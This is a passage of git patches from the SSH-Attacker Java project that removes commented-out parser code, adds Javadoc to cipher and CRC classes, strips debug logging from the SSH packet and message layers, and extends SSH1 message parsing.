UserAuthKeyboardInteractiveMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthKeyboardInteractiveMessageParser(array, startPosition); - }*/ @Override public UserAuthKeyboardInteractiveMessagePreparator getPreparator(SshContext context) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthNoneMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthNoneMessage.java index 182e2ce5b..5f830efc9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthNoneMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthNoneMessage.java @@ -27,17 +27,6 @@ public SshMessageParser getParser(SshContext context, Input return new UserAuthNoneMessageParser(stream); } - /* - @Override - public SshMessageParser getParser(byte[] array) { - return new UserAuthNoneMessageParser(array); - } - - @Override - public SshMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthNoneMessageParser(array, startPosition); - }*/ - @Override public UserAuthNoneMessagePreparator getPreparator(SshContext context) { return new UserAuthNoneMessagePreparator(context.getChooser(), this); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPasswordMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPasswordMessage.java index e4d8392fd..cf5a7e778 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPasswordMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPasswordMessage.java @@ -137,17 +137,6 @@ public SshMessageParser getParser( return new UserAuthPasswordMessageParser(stream); } - /* - @Override - public SshMessageParser getParser(byte[] array) { - return new UserAuthPasswordMessageParser(array); - } - - @Override - public SshMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthPasswordMessageParser(array, startPosition); - } - */ @Override public UserAuthPasswordMessagePreparator getPreparator(SshContext context) { return new UserAuthPasswordMessagePreparator(context.getChooser(), this); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPkOkMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPkOkMessage.java index 5fdc413e2..b605e4924 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPkOkMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPkOkMessage.java @@ -110,15 +110,6 @@ public UserAuthPkOkMessageHandler getHandler(SshContext context) { public UserAuthPkOkMessageParser getParser(SshContext context, InputStream stream) { return new UserAuthPkOkMessageParser(stream); } - /*@Override - public UserAuthPkOkMessageParser getParser(byte[] array) { - return new UserAuthPkOkMessageParser(array); - } - - @Override - public UserAuthPkOkMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthPkOkMessageParser(array, startPosition); - }*/ @Override public SshMessagePreparator getPreparator(SshContext context) { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPubkeyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPubkeyMessage.java index 048d1de1a..e79e3979f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPubkeyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPubkeyMessage.java @@ -167,16 +167,6 @@ public UserAuthPubkeyMessageParser getParser(SshContext context, InputStream str return new UserAuthPubkeyMessageParser(stream); } - /*@Override - public UserAuthPubkeyMessageParser getParser(byte[] array) { - return new UserAuthPubkeyMessageParser(array); - } - - @Override - public UserAuthPubkeyMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthPubkeyMessageParser(array, startPosition); - }*/ - @Override public UserAuthPubkeyMessagePreparator getPreparator(SshContext context) { return new UserAuthPubkeyMessagePreparator(context.getChooser(), this); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthSuccessMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthSuccessMessage.java index 3955ec3a5..a4e54174f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthSuccessMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthSuccessMessage.java @@ -27,16 +27,6 @@ public UserAuthSuccessMessageParser getParser(SshContext context, InputStream st return new UserAuthSuccessMessageParser(stream); } - /*@Override - public UserAuthSuccessMessageParser getParser(byte[] array) { - return new UserAuthSuccessMessageParser(array); - } - - @Override - public UserAuthSuccessMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthSuccessMessageParser(array, startPosition); - }*/ - @Override public UserAuthSuccessMessagePreparator getPreparator(SshContext context) { return new UserAuthSuccessMessagePreparator(context.getChooser(), this); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthUnknownMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthUnknownMessage.java index 0441d3959..6ce8a2d85 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthUnknownMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthUnknownMessage.java @@ -45,16 +45,6 @@ public SshMessageParser getParser( return new UserAuthUnknownMessageParser(stream); } - /*@Override - public SshMessageParser getParser(byte[] array) { - return new UserAuthUnknownMessageParser(array); - } - - @Override - public SshMessageParser getParser(byte[] array, int startPosition) { - return new UserAuthUnknownMessageParser(array, startPosition); - }*/ - @Override public UserAuthUnknownMessagePreparator getPreparator(SshContext context) { return new UserAuthUnknownMessagePreparator(context.getChooser(), this); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java index 2b146b4e9..08873ff22 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/UserAuthBannerMessageParser.java @@ -19,15 +19,7 @@ public class UserAuthBannerMessageParser extends SshMessageParser { private static final Logger LOGGER = LogManager.getLogger(); - /* - - public UserAuthUnknownMessageParser(byte[] array) { - super(array); - } - public UserAuthUnknownMessageParser(byte[] array, int startPosition) { - super(array, startPosition); - } - */ public UserAuthUnknownMessageParser(InputStream stream) { super(stream); } - /* - @Override - public UserAuthUnknownMessage createMessage() { - return new UserAuthUnknownMessage(); - } - */ - private void parseMethodSpecificFields(UserAuthUnknownMessage message) { message.setMethodSpecificFields(parseByteArrayField(getBytesLeft())); LOGGER.debug( From 5a040b783512a3f12363064593221e472e1b75f0 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 29 Feb 2024 14:59:18 +0100 Subject: [PATCH 150/176] Add Documentation --- .../sshattacker/core/crypto/checksum/CRC.java | 15 +++++++++++++- .../core/crypto/cipher/RsaTextbookCipher.java | 20 +++++++++++++++++++ 2 files changed, 34 insertions(+), 1 deletion(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/checksum/CRC.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/checksum/CRC.java index c0ad5cbc8..fc653e2d4 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/checksum/CRC.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/checksum/CRC.java @@ -31,6 +31,12 @@ private long reverseBits(long n, int numBits) { return result; } + /** + * Calculates the cyclic redundancy check (CRC) value for the given data. + * + * @param data the input data for which the CRC value is calculated + * @return the calculated CRC value + */ public long calculateCRC(byte[] data) { long curValue = this.init; long topBit = 1L << (this.width - 1); @@ -65,6 +71,10 @@ public long calculateCRC(byte[] data) { return curValue & mask; } + /** + * This class represents a cyclic redundancy check (CRC). It calculates the CRC value for a + * given input data. It can be used for any CRC-check calculation. + */ public CRC( int width, long polynomial, @@ -85,7 +95,10 @@ public CRC( } } - // Default-Values for SSHv1 + /** + * This class represents a cyclic redundancy check (CRC). It is used to calculate the CRC value + * for a given input data. It sets the default values needed for sshv1 + */ public CRC() { this.width = 32; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaTextbookCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaTextbookCipher.java index 3f0d7b987..5b370373a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaTextbookCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/RsaTextbookCipher.java @@ -34,6 +34,13 @@ public RsaTextbookCipher(Key key) { this.key = key; } + /** + * Encrypts the given byte array using RSA encryption. + * + * @param plainData the byte array to be encrypted + * @return the encrypted byte array + * @throws CryptoException if an error occurs during encryption + */ @Override public byte[] encrypt(byte[] plainData) throws CryptoException { prepareCipher(Cipher.ENCRYPT_MODE); @@ -54,6 +61,13 @@ public byte[] encrypt(byte[] plainData, byte[] iv, byte[] additionalAuthenticate throw new UnsupportedOperationException("AEAD encryption not supported."); } + /** + * Decrypts the given byte array using RSA decryption. + * + * @param encryptedData the byte array to be decrypted + * @return the decrypted byte array + * @throws CryptoException if an error occurs during decryption + */ @Override public byte[] decrypt(byte[] encryptedData) throws CryptoException { prepareCipher(Cipher.DECRYPT_MODE); @@ -79,6 +93,12 @@ public EncryptionAlgorithm getAlgorithm() { return null; } + /** + * Prepares the RSA-Cipher for encryption or decryption mode. + * + * @param mode the mode of the Cipher object. Use Cipher.ENCRYPT_MODE for encryption and + * Cipher.DECRYPT_MODE for decryption. + */ private void prepareCipher(int mode) { if (key instanceof CustomRsaPublicKey && mode == Cipher.ENCRYPT_MODE) { CustomRsaPublicKey publicKey = (CustomRsaPublicKey) key; From 768b8be269884d18599e86b0620d1573bfca3de8 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Thu, 29 Feb 2024 14:59:54 +0100 Subject: [PATCH 151/176] Clean from Debug output and simply packetparsing --- .../core/crypto/cipher/TribleDESCipher.java | 17 + .../sshattacker/core/layer/LayerStack.java | 2 +- .../core/layer/impl/PacketLayer.java | 22 +- .../core/layer/impl/SSH1Layer.java | 111 ++-- .../core/layer/impl/SSH2Layer.java | 488 ++---------------- .../core/packet/cipher/PacketMacedCipher.java | 2 +- .../core/packet/cipher/PacketSsh1Cipher.java | 9 - .../packet/parser/BinaryPacketParser.java | 18 - 8 files changed, 98 insertions(+), 571 deletions(-) diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/TribleDESCipher.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/TribleDESCipher.java index 95a52cea3..c16f1c8c2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/TribleDESCipher.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/crypto/cipher/TribleDESCipher.java @@ -26,6 +26,7 @@ class TribleDESCipher extends AbstractCipher { private final Cipher encCipher1, encCipher2, encCipher3; private final Cipher decCipher1, decCipher2, decCipher3; + /** Class representing the TripleDES cipher. */ public TribleDESCipher(byte[] key) { LOGGER.debug("Init with key {}", ArrayConverter.bytesToHexString(key)); @@ -75,6 +76,14 @@ public byte[] encrypt(byte[] plainData) throws CryptoException { return encrypt(plainData, new byte[8]); } + /** + * Encrypts the given plain data using the 3DES (Triple DES) algorithm. + * + * @param plainData the data to be encrypted + * @param iv the initialization vector + * @return the encrypted data + * @throws CryptoException if an error occurs during the encryption process + */ @Override public byte[] encrypt(byte[] plainData, byte[] iv) throws CryptoException { // iv = new byte[8]; @@ -105,6 +114,14 @@ public byte[] decrypt(byte[] encryptedData) throws CryptoException { return decrypt(encryptedData, new byte[8]); } + /** + * Decrypts the given encrypted data using the 3DES (Triple DES) algorithm. + * + * @param encryptedData the data to be decrypted + * @param iv the initialization vector + * @return the decrypted data + * @throws CryptoException if an error occurs during the decryption process + */ @Override public byte[] decrypt(byte[] encryptedData, byte[] iv) throws CryptoException { // iv = new byte[8]; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java index 068eb1d93..666c1e59b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/LayerStack.java @@ -81,7 +81,7 @@ public ProtocolLayer getLowestLayer() { */ public LayerStackProcessingResult sendData(List layerConfigurationList) throws IOException { - LOGGER.debug("Sending Data"); + ; if (getLayerList().size() != layerConfigurationList.size()) { throw new RuntimeException( "Illegal LayerConfiguration list provided. Each layer needs a configuration entry (null is fine too if no explicit configuration is desired). Expected " diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java index 767459ddd..cbccbfea1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/PacketLayer.java @@ -137,14 +137,12 @@ public LayerProcessingResult receiveData() { @Override public void receiveMoreData() throws IOException { - LOGGER.debug("[bro] receiveMoreDataForHint now in Transport"); InputStream dataStream = getLowerLayer().getDataStream(); LOGGER.debug("Available Data: {}", dataStream.available()); AbstractPacketParser parser; AbstractPacket packet; - - LOGGER.debug("[bro] Receiving a {}", context.getPacketLayer()); if (context.getPacketLayerType() == PacketLayerType.BINARY_PACKET) { + // If we have a SSHv1 connection, parse as sshv1-packet if (this.getHigherLayer().getLayerType().getName().equals("SSHV1")) { parser = new BinaryPacketParserSSHv1( @@ -153,6 +151,7 @@ public void receiveMoreData() throws IOException { context.getReadSequenceNumber()); packet = new BinaryPacketSSHv1(); } else { + // If not, trade it as sshv2-packet parser = new BinaryPacketParser( dataStream, @@ -168,18 +167,15 @@ public void receiveMoreData() throws IOException { throw new RuntimeException(); } - LOGGER.debug("[bro] Parsing a {}", context.getPacketLayer()); parser.parse(packet); - LOGGER.debug( - "[bro] Recieved Packet: " + packet.getPayload() + " | " + packet.getCiphertext()); + LOGGER.debug("Recieved Packet: {} | {}", packet.getPayload(), packet.getCiphertext()); decryptPacket(packet); decompressPacket(packet); LOGGER.debug( - "[bro] Decompressed Payload: {}", - ArrayConverter.bytesToHexString(packet.getPayload())); + "Decompressed Payload: {}", ArrayConverter.bytesToHexString(packet.getPayload())); addProducedContainer(packet); @@ -232,17 +228,15 @@ public void updateDecompressionAlgorithm(CompressionAlgorithm algorithm) { public void updateEncryptionCipher(PacketCipher encryptionCipher) { LOGGER.debug( - "Activating new EncryptionCipher (" - + encryptionCipher.getClass().getSimpleName() - + ")"); + "Activating new EncryptionCipher ({})", + encryptionCipher.getClass().getSimpleName()); encryptor.addNewPacketCipher(encryptionCipher); } public void updateDecryptionCipher(PacketCipher decryptionCipher) { LOGGER.debug( - "Activating new DecryptionCipher (" - + decryptionCipher.getClass().getSimpleName() - + ")"); + "Activating new DecryptionCipher ({})", + decryptionCipher.getClass().getSimpleName()); decryptor.addNewPacketCipher(decryptionCipher); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java index 19a628013..f88286b16 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH1Layer.java @@ -7,7 +7,6 @@ */ package de.rub.nds.sshattacker.core.layer.impl; -import de.rub.nds.modifiablevariable.util.ArrayConverter; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; import de.rub.nds.sshattacker.core.constants.MessageIdConstantSSH1; import de.rub.nds.sshattacker.core.constants.PacketLayerType; @@ -50,21 +49,10 @@ public LayerProcessingResult sendConfiguration() throws IOException { LayerConfiguration configuration = getLayerConfiguration(); MessageIdConstant runningProtocolMessageType = null; ByteArrayOutputStream collectedMessageStream = new ByteArrayOutputStream(); - if (configuration != null) { - LOGGER.debug( - "[bro] Sending following configuration-size {} with layer_0 is {}", - configuration.getContainerList().size(), - configuration.getContainerList().get(0).toCompactString()); - } else { - LOGGER.debug("[bro] Configuration is null"); - } if (configuration != null && configuration.getContainerList() != null) { for (ProtocolMessage message : configuration.getContainerList()) { collectedMessageStream = new ByteArrayOutputStream(); - - LOGGER.debug("[bro] here i am with sending the message"); - runningProtocolMessageType = message.getMessageIdConstant(); processMessage(message, collectedMessageStream); addProducedContainer(message); @@ -76,15 +64,6 @@ public LayerProcessingResult sendConfiguration() throws IOException { } } } - - if (runningProtocolMessageType == null) { - LOGGER.debug("[bro] Protocol Message Type is null!"); - } else { - LOGGER.debug("ProtocolMessageType: {}", runningProtocolMessageType.getId()); - } - - LOGGER.debug("[bro] " + "flushing {} to lower layer", collectedMessageStream.toByteArray()); - return getLayerResult(); } @@ -102,27 +81,11 @@ private void processMessage( message.setCompleteResultingMessage(serializedMessage); collectedMessageStream.writeBytes(message.getCompleteResultingMessage().getValue()); - - /* if (message.getCompleteResultingMessage().getValue()[0] - == ProtocolMessageType.SSH_MSG_NEWKEYS.getValue() - || message.getCompleteResultingMessage().getValue()[0] - == ProtocolMessageType.SSH_MSG_KEXINIT.getValue()) { - message.getHandler(context).adjustContextAfterMessageSent(message); - } else { - LOGGER.info( - "[bro] Adjusting Context while messagetype is {}", - message.getCompleteResultingMessage().getValue()[0]); - }*/ } private void flushCollectedMessages( MessageIdConstant runningProtocolMessageType, ByteArrayOutputStream byteStream) throws IOException { - - LOGGER.debug( - "[bro] Sending the following {} on {}", - byteStream.toByteArray(), - getLowerLayer().getLayerType()); if (byteStream.size() > 0) { getLowerLayer().sendData(byteStream.toByteArray()); byteStream.reset(); @@ -136,34 +99,27 @@ public LayerProcessingResult sendData(byte[] additionalData) throws IOException @Override public LayerProcessingResult receiveData() { - LOGGER.debug("[bro] SSH-Layer ist Recieving Data now"); try { HintedInputStream dataStream; do { try { - LOGGER.debug("[bro] I´m here"); dataStream = getLowerLayer().getDataStream(); - LOGGER.debug("[bro] I was here"); } catch (IOException e) { // the lower layer does not give us any data so we can simply return here LOGGER.debug("The lower layer did not produce a data stream: ", e); return getLayerResult(); } - LOGGER.debug("[bro] Searching for Hint"); - byte[] streamContent; try { - LOGGER.debug("I could read {} bytes", dataStream.available()); + LOGGER.debug("The Stream holds {} bytes", dataStream.available()); streamContent = dataStream.readChunk(dataStream.available()); } catch (IOException e) { throw new RuntimeException(e); } - LOGGER.debug("STREAMCONTENT: {}", ArrayConverter.bytesToHexString(streamContent)); AbstractPacket packet; - LOGGER.debug("[bro] Recieving a {}", context.getPacketLayer()); if (context.getPacketLayerType() == PacketLayerType.BINARY_PACKET) { packet = new BinaryPacket(); } else if (context.getPacketLayerType() == PacketLayerType.BLOB) { @@ -173,19 +129,8 @@ public LayerProcessingResult receiveData() { } packet.setPayload(streamContent); - parseMessageFromID(packet, context); - /* - if (tempHint == null) { - LOGGER.warn( - "The TLS message layer requires a processing hint. E.g. a record type. Parsing as an unknown message"); - readUnknownProtocolData(); - } else if (tempHint instanceof PacketLayerHintSSHV1) { - PacketLayerHintSSHV1 hint = (PacketLayerHintSSHV1) dataStream.getHint(); - LOGGER.debug("[bro] reading message for Hint {}", hint.getType()); - readMessageForHint(hint); - }*/ - // receive until the layer configuration is satisfied or no data is left + } while (shouldContinueProcessing()); } catch (TimeoutException ex) { LOGGER.debug(ex); @@ -229,82 +174,92 @@ public void parseMessageFromID(AbstractPacket packet, SshContext context) { switch (id) { case SSH_MSG_DISCONNECT: - LOGGER.debug("[bro] Reading SSH_MSG_DISCONNECT Paket"); readDataFromStream(new DisconnectMessageSSH1(), (BinaryPacket) packet); break; case SSH_CMSG_USER: - LOGGER.debug("[bro] Reading SSH_CMSG_USER Paket"); readDataFromStream(new UserMessageSSH1(), (BinaryPacket) packet); break; case SSH_SMSG_PUBLIC_KEY: - LOGGER.debug("[bro] Reading SSH_SMSG_PUBLIC_KEY Paket"); readDataFromStream(new ServerPublicKeyMessage(), (BinaryPacket) packet); break; case SSH_CMSG_SESSION_KEY: - LOGGER.debug("[bro] Reading SSH_CMSG_SESSION_KEY Paket"); readDataFromStream(new ClientSessionKeyMessage(), (BinaryPacket) packet); break; case SSH_MSG_IGNORE: - LOGGER.debug("[bro] Reading SSH_MSG_IGNORE Paket"); readDataFromStream(new IgnoreMessageSSH1(), (BinaryPacket) packet); break; case SSH_MSG_DEBUG: - LOGGER.debug("[bro] Reading SSH_MSG_DEBUG Paket"); readDataFromStream(new DebugMessageSSH1(), (BinaryPacket) packet); break; case SSH_CMSG_EOF: - LOGGER.debug("[bro] Reading SSH_CMSG_EOF Paket"); readDataFromStream(new EofMessageSSH1(), (BinaryPacket) packet); break; case SSH_CMSG_EXEC_CMD: - LOGGER.debug("[bro] Reading SSH_CMSG_EXEC_CMD Paket"); readDataFromStream(new ExecCmdMessageSSH1(), (BinaryPacket) packet); break; case SSH_CMSG_EXEC_SHELL: - LOGGER.debug("[bro] Reading SSH_CMSG_EXEC_SHELL Paket"); readDataFromStream(new ExecShellMessageSSH1(), (BinaryPacket) packet); break; case SSH_CMSG_EXIT_CONFIRMATION: - LOGGER.debug("[bro] Reading SSH_CMSG_EXIT_CONFIRMATION Paket"); readDataFromStream(new ExitConfirmationMessageSSH1(), (BinaryPacket) packet); break; case SSH_CMSG_STDIN_DATA: - LOGGER.debug("[bro] Reading SSH_CMSG_STDIN_DATA Paket"); readDataFromStream(new StdinDataMessageSSH1(), (BinaryPacket) packet); break; case SSH_SMSG_STDOUT_DATA: - LOGGER.debug("[bro] Reading SSH_SMSG_STDOUT_DATA Paket"); readDataFromStream(new StdoutDataMessageSSH1(), (BinaryPacket) packet); break; case SSH_SMSG_STDERR_DATA: - LOGGER.debug("[bro] Reading SSH_SMSG_STDERR_DATA Paket"); readDataFromStream(new StderrDataMessageSSH1(), (BinaryPacket) packet); break; case SSH_MSG_CHANNEL_OPEN_CONFIRMATION: - LOGGER.debug("[bro] Reading SSH_MSG_CHANNEL_OPEN_CONFIRMATION Paket"); break; case SSH_SMSG_EXITSTATUS: - LOGGER.debug("[bro] Reading SSH_SMSG_EXITSTATUS Paket"); readDataFromStream(new ExitStatusMessageSSH1(), (BinaryPacket) packet); break; case SSH_MSG_CHANNEL_OPEN_FAILURE: - LOGGER.debug("[bro] Reading SSH_MSG_CHANNEL_OPEN_FAILURE Paket"); + readDataFromStream(new ChannelOpenFailureMessageSSH1(), (BinaryPacket) packet); break; case SSH_MSG_CHANNEL_DATA: - LOGGER.debug("[bro] Reading SSH_MSG_CHANNEL_DATA Paket"); + readDataFromStream(new ChannelDataMessageSSH1(), (BinaryPacket) packet); break; case SSH_MSG_CHANNEL_CLOSE: - LOGGER.debug("[bro] Reading SSH_MSG_CHANNEL_CLOSE Paket"); + readDataFromStream(new ChannelCloseMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_MSG_CHANNEL_CLOSE_CONFIRMATION: + readDataFromStream( + new ChannelCloseConfirmationMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_CMSG_AUTH_RSA: + readDataFromStream(new RsaAuthMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_CMSG_PORT_FORWARD_REQUEST: + readDataFromStream(new PortForwardRequestMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_CMSG_AGENT_REQUEST_FORWARDING: + readDataFromStream(new AgentRequestForwardingMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_CMSG_AUTH_PASSWORD: + readDataFromStream(new AuthPasswordSSH1(), (BinaryPacket) packet); + break; + case SSH_CMSG_AUTH_RHOSTS: + readDataFromStream(new AuthRhostsSSH1(), (BinaryPacket) packet); + break; + case SSH_MSG_PORT_OPEN: + readDataFromStream(new PortOpenMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_SMSG_AGENT_OPEN: + readDataFromStream(new AgentOpenMessageSSH1(), (BinaryPacket) packet); + break; + case SSH_SMSG_X11_OPEN: + readDataFromStream(new X11OpenMessageSSH1(), (BinaryPacket) packet); break; case SSH_CMSG_AUTH_TIS: - LOGGER.debug("[bro] Reading SSH_CMSG_AUTH_TIS Paket"); break; case SSH_SMSG_SUCCESS: - LOGGER.debug("[bro] Reading SSH_SMSG_SUCCESS Paket"); readDataFromStream(new SuccessMessageSSH1(), (BinaryPacket) packet); break; case SSH_SMSG_FAILURE: - LOGGER.debug("[bro] Reading SSH_SMSG_FAILURE Paket"); readDataFromStream(new FailureMessageSSH1(), (BinaryPacket) packet); break; default: diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index 2d7460190..3464256b7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -169,230 +169,169 @@ public void parseMessageFromID(AbstractPacket packet, SshContext context) { switch (MessageIdConstant.fromId(packet.getPayload().getValue()[0], context.getContext())) { case SSH_MSG_DISCONNECT: - LOGGER.debug("[bro] parsing SSH_MSG_DISCONNECT Message"); - readDisconnect((BinaryPacket) packet); + readMessageFromStream(new DisconnectMessage(), (BinaryPacket) packet); return; case SSH_MSG_IGNORE: - LOGGER.debug("[bro] parsing SSH_MSG_IGNORE Message"); - readIngoreMessage((BinaryPacket) packet); + readMessageFromStream(new IgnoreMessage(), (BinaryPacket) packet); return; case SSH_MSG_UNIMPLEMENTED: - LOGGER.debug("[bro] parsing SSH_MSG_UNIMPLEMENTED Message"); return; case SSH_MSG_DEBUG: - LOGGER.debug("[bro] parsing SSH_MSG_DEBUG Message"); return; case SSH_MSG_SERVICE_ACCEPT: - LOGGER.debug("[bro] parsing SSH_MSG_SERVICE_ACCEPT Message"); - readMsgServiceAccept((BinaryPacket) packet); + readMessageFromStream(new ServiceAcceptMessage(), (BinaryPacket) packet); return; case SSH_MSG_EXT_INFO: - LOGGER.debug("[bro] parsing SSH_MSG_EXT_INFO Message"); return; case SSH_MSG_NEWCOMPRESS: - LOGGER.debug("[bro] parsing SSH_MSG_NEWCOMPRESS Message"); return; case SSH_MSG_KEXINIT: - LOGGER.debug("[bro] parsing SSH KEX INIT Message"); - readKexInitProtocolData((BinaryPacket) packet); + readMessageFromStream(new KeyExchangeInitMessage(), (BinaryPacket) packet); return; case SSH_MSG_NEWKEYS: - LOGGER.debug("[bro] parsing SSH_MSG_NEWKEYS Message"); - readNewKeysProtocolData((BinaryPacket) packet); + readMessageFromStream(new NewKeysMessage(), (BinaryPacket) packet); return; case SSH_MSG_KEX_DH_GEX_REQUEST_OLD: - LOGGER.debug("[bro] parsing SSH_MSG_KEX_DH_GEX_REQUEST_OLD Message"); - readGexDHExchangeOldRequest((BinaryPacket) packet); + readMessageFromStream( + new DhGexKeyExchangeOldRequestMessage(), (BinaryPacket) packet); return; case SSH_MSG_KEX_DH_GEX_REQUEST: - LOGGER.debug("[bro] parsing SSH_MSG_KEX_DH_GEX_REQUEST Message"); - readGexDHExchangeRequest((BinaryPacket) packet); + readMessageFromStream(new DhGexKeyExchangeRequestMessage(), (BinaryPacket) packet); return; case SSH_MSG_KEX_DH_GEX_GROUP: - LOGGER.debug("[bro] parsing SSH_MSG_KEX_DH_GEX_GROUP Message"); - readGexKeyExchangeGroup((BinaryPacket) packet); + readMessageFromStream(new DhGexKeyExchangeGroupMessage(), (BinaryPacket) packet); return; case SSH_MSG_KEX_DH_GEX_INIT: - LOGGER.debug("[bro] parsing SSH_MSG_KEX_DH_GEX_INIT Message"); - readGexDHExchangeInitMessage((BinaryPacket) packet); + readMessageFromStream(new DhGexKeyExchangeInitMessage(), (BinaryPacket) packet); return; case SSH_MSG_KEX_DH_GEX_REPLY: - LOGGER.debug("[bro] parsing SSH_MSG_KEX_DH_GEX_REPLY Message"); - readGexDHExchangeReplyMessage((BinaryPacket) packet); + readMessageFromStream(new DhGexKeyExchangeReplyMessage(), (BinaryPacket) packet); return; case SSH_MSG_KEXDH_INIT: - LOGGER.debug("[bro] parsing SSH_MSG_KEXDH_INIT Message"); - readDhKeyInitMessage((BinaryPacket) packet); + readMessageFromStream(new DhKeyExchangeInitMessage(), (BinaryPacket) packet); return; case SSH_MSG_KEXDH_REPLY: - LOGGER.debug("[bro] parsing SSH_MSG_KEXDH_REPLY Message"); - readDhKeyReplyMessage((BinaryPacket) packet); + readMessageFromStream(new DhKeyExchangeReplyMessage(), (BinaryPacket) packet); return; case SSH_MSG_HBR_INIT: - LOGGER.debug("[bro] parsing SSH_MSG_HBR_INIT Message"); - readHbrInitProtocolData((BinaryPacket) packet); + readMessageFromStream(new HybridKeyExchangeInitMessage(), (BinaryPacket) packet); return; case SSH_MSG_HBR_REPLY: - LOGGER.debug("[bro] parsing SSH_MSG_HBR_REPLY Message"); - readHbrReplProtocolData((BinaryPacket) packet); + 